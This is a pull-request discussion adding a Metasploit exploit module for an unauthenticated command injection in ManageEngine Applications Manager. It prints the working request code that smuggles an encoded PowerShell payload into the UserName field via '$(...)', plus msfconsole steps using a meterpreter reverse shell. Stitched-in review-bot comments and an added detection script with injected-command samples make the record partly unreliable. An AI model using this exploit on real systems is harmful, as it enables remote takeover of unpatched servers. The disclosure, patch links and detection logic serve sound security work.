Adding ManageEngine Application Manager RCE #9684
Conversation
This was my first time using rubocop. I don't know how to fix the following errors. Those errors are mostly related to the indentation of parameters of Any idea how to fix them too? Or ignore them by updating the .rubocop.yml file?
@mmetince: You can read about the layout cops at https://rubocop.readthedocs.io/en/latest/cops_layout/. You can also read its parent doc at https://github.com/bbatsov/ruby-style-guide. Cheers!

Thanks @wvu-r7, I've solved 'em all. 👍
Go to following website and download Windows version of the product. It comes with built-in Java and Postgresql so you don't need to install anything else.
[https://www.manageengine.com/products/applications_manager/download.html](https://www.manageengine.com/products/applications_manager/download.html)
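Review bot: the documentation sentence is missing its articles and the product name is miscased; suggest "Go to the following website and download the Windows version of the product. It comes with built-in Java and PostgreSQL, so you don't need to install anything else."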
## Verification Steps
These steps are a lie.
Consider:
1. Start `msfconsole`
2. `use exploit/windows/http/manageengine_appmanager_exec`
3. Set `RHOST <RHOST>`
4. Set `PAYLOAD windows/meterpreter/reverse_tcp`
5. Set `LHOST <LHOST>`
6. Run `check`
7. **Verify** that you are seeing `The target is vulnerable.` in console.
8. Run `exploit`
9. **Verify** that you are seeing `Triggering the vulnerability` in console.
10. **Verify** that you are seeing `Sending stage to <TARGET>` in console.
11. **Verify** that you have your shell.
Oops, sorry. I forgot to update it from another module.
'isAgentAssociated' => 'false',
'displayname' => Rex::Text.rand_text_alpha(10),
'HostName' => '127.0.0.1', # Try to access random IP address or domain may trigger SIEMs or DLP systems...
'Version' => '2013',
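Review bot: the inline comment on the `'HostName'` line reads awkwardly; suggest "Trying to reach a random IP address or domain may trigger SIEM or DLP systems, so stay on the loopback address" so the reason for the fixed `127.0.0.1` value is clear to the next reader.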
Does 2013 need to be static?
'montype' => 'OfficeSharePointServer',
'isAgentEnabled' => 'NO',
'isAgentAssociated' => 'false',
'displayname' => Rex::Text.rand_text_alpha(10),
Randomization for the win:
'displayname' => Rex::Text.rand_text_alpha(rand(10..15)),
print_status('Triggering the vulnerability')
send_request_cgi(
Does the server return a response when exploitation is successful, or does triggering the payload cause the request to timeout?
If the server returns a response, it might be nice to validate the response and print an appropriate message.
Nope, since this is a command injection issue, a request that exploits the vulnerability will hang.
)
end
def check
Perhaps I missed something, but it looks like the HTTP request in the check method and exploit method are almost identical, with the exception of the UserName.
You could create a new method which takes a username parameter and returns the result of the send_request_cgi call, then call this method from both the check method and exploit method.
Not required, but it's nice to be DRY :)
Something like this:

```ruby
def test_credential(username)
  send_request_cgi(
    'method' => 'POST',
    'uri' => normalize_uri(target_uri.path, 'testCredential.do'),
    'vars_post' => {
      'method' => 'testCredentialForConfMonitors',
      'type' => 'OfficeSharePointServer',
      'montype' => 'OfficeSharePointServer',
      'isAgentEnabled' => 'NO',
      'isAgentAssociated' => 'false',
      'displayname' => Rex::Text.rand_text_alpha(rand(10..15)),
      'HostName' => '127.0.0.1', # Try to access random IP address or domain may trigger SIEMs or DLP systems...
      'Version' => '2013',
      'Powershell' => 'True', # :-)
      'CredSSP' => 'False',
      'SPType' => 'SPServer',
      'CredentialDetails' => 'nocm',
      'Password' => Rex::Text.rand_text_alpha(rand(3..10)),
      'UserName' => username
    }
  )
end

def check
  res = test_credential(Rex::Text.rand_text_alpha(rand(3..10)))
  unless res
    vprint_error('Connection failed')
    return CheckCode::Unknown
  end
  if res.body.include?('Kindly check the credentials and try again')
    return Exploit::CheckCode::Vulnerable
  end
  Exploit::CheckCode::Safe
end

def exploit
  powershell_options = {
    encode_final_payload: true,
    remove_comspec: true
  }
  p = cmd_psh_payload(payload.encoded, payload_instance.arch.first, powershell_options)
  print_status('Triggering the vulnerability')
  test_credential("$(#{p})")
end
```
Couldn't agree more. Done^^
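The exchange above pins down what a request against this endpoint looks like: a POST to `testCredential.do` with `method=testCredentialForConfMonitors`, where the module's check sends a harmless random `UserName` and the exploit sends a `$(...)` substitution in the same field. The following is an added detection example, not code from the pull request or from Metasploit: it parses constructed capture records (a WAF or full-packet capture is assumed to provide URI plus URL-encoded POST body) and flags credential-test requests whose decoded parameter values carry shell substitution or chaining metacharacters. It checks every parameter, not only `UserName`, so the page's single case is generalised.

```ruby
require 'uri'

# Constructed sample capture records (not real logs), one per line:
# "<timestamp> <src_ip> <uri> <urlencoded POST body>". The second and third
# carry "$(whoami)" and "`whoami`" in UserName; the rest are benign or unrelated.
SAMPLE_RECORDS = [
  '2018-03-11T10:00:01Z 10.0.0.5 /testCredential.do method=testCredentialForConfMonitors&type=OfficeSharePointServer&UserName=svc_sp&Password=Winter2018',
  '2018-03-11T10:00:07Z 10.0.0.9 /testCredential.do method=testCredentialForConfMonitors&type=OfficeSharePointServer&UserName=%24%28whoami%29&Password=abc',
  '2018-03-11T10:00:09Z 10.0.0.9 /testCredential.do method=testCredentialForConfMonitors&type=OfficeSharePointServer&UserName=a%60whoami%60&Password=abc',
  '2018-03-11T10:01:00Z 10.0.0.7 /index.do page=home',
  '2018-03-11T10:01:05Z 10.0.0.7 /testCredential.do method=somethingElse&UserName=%24%28x%29'
].freeze

# PowerShell/shell substitution and command-chaining metacharacters; none of
# these belong in a credential-test parameter value.
SHELL_META = /\$\(|`|[;|&]/

# Parses one record. Returns nil unless it is a testCredentialForConfMonitors
# POST to testCredential.do; otherwise a hash with the decoded parameters.
def parse_record(line)
  ts, src, uri, body = line.split(' ', 4)
  return nil unless body && uri.end_with?('/testCredential.do')
  params = URI.decode_www_form(body).to_h
  return nil unless params['method'] == 'testCredentialForConfMonitors'
  { ts: ts, src: src, params: params }
end

# Names of parameters whose decoded value contains shell metacharacters.
def injected_fields(params)
  params.select { |_k, v| v.match?(SHELL_META) }.keys
end

# Scans all records and returns one alert hash per suspicious request.
def scan_records(lines)
  lines.filter_map do |line|
    next unless (rec = parse_record(line))
    fields = injected_fields(rec[:params])
    next if fields.empty?
    { ts: rec[:ts], src: rec[:src], fields: fields }
  end
end

if __FILE__ == $PROGRAM_NAME
  scan_records(SAMPLE_RECORDS).each do |a|
    puts "#{a[:ts]} #{a[:src]} suspicious testCredential.do request, metacharacters in: #{a[:fields].join(', ')}"
  end
end
```

A benign random-alpha username, which is what the module's check sends, produces no alert; only the substitution syntax the exploit path relies on does.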
While letting the vendor know about this bug, I notice that their bug bounty calls it Applications Manager (note the plural). Just fyi. I wonder how many of our modules are incorrect.
There, let the vendor know, they're tracking it as ZVE-2018-0492, in case you haven't done this already, @mmetince

@todb-r7 thanks. It seems they released a patch. https://pitstop.manageengine.com/portal/community/topic/security-vulnerability-issues-fixed-upgrade-to-the-latest-version-of-applications-manager
Left a comment but it's a tiny nit to pick. We probably need to grep through the other modules for this inconsistency, so don't consider this a hold up.
super(update_info(info,
  'Name' => "ManageEngine Applications Manager Remote Code Execution",
  'Description' => %q(
    This module exploits command injection vulnerability in the ManageEngine Application Manager product.
Should be Applications Manager, not Application Manager (apparently)
I will replace "application" with "applications", thank you very much @todb-r7.
A couple tiny nitpicks with the grammar in the description.
It may also be worth adding the
[ 'BID' => '103358' ]
and patch URL
[ 'URL' => 'https://pitstop.manageengine.com/portal/community/topic/security-vulnerability-issues-fixed-upgrade-to-the-latest-version-of-applications-manager' ]
to the References array.
Approved, but untested.
Love ManageEngine vulns.

Works for me:
Release Notes
The exploits/windows/http/manageengine_appmanager_exec module has been added to the framework. It exploits a command injection vulnerability in the ManageEngine Application Manager product. An unauthenticated user can execute an operating system command under the context of a privileged user.

This module exploits a command injection vulnerability -0day as far as I know- in the ManageEngine Application Manager product. An unauthenticated user can execute an operating system command under the context of a privileged user.
A successful check of the exploit will look like this:
1. Start `msfconsole`
2. `use exploit/linux/http/securityonion_xplico_exec`
3. Set `RHOST`
4. Set `PAYLOAD windows/meterpreter/reverse_tcp`
5. Set `LHOST`
6. Run `check`
7. Verify that you are seeing `The target is vulnerable.` in console.
8. Run `exploit`
9. Verify that you are seeing `Triggering the vulnerability` in console.
10. Verify that you are seeing `Sending stage (179779 bytes) to <TARGET>` in console.

Scenarios
Technical Details and Module Demo
https://pentest.blog/advisory-manageengine-applications-manager-remote-code-execution-sqli-and/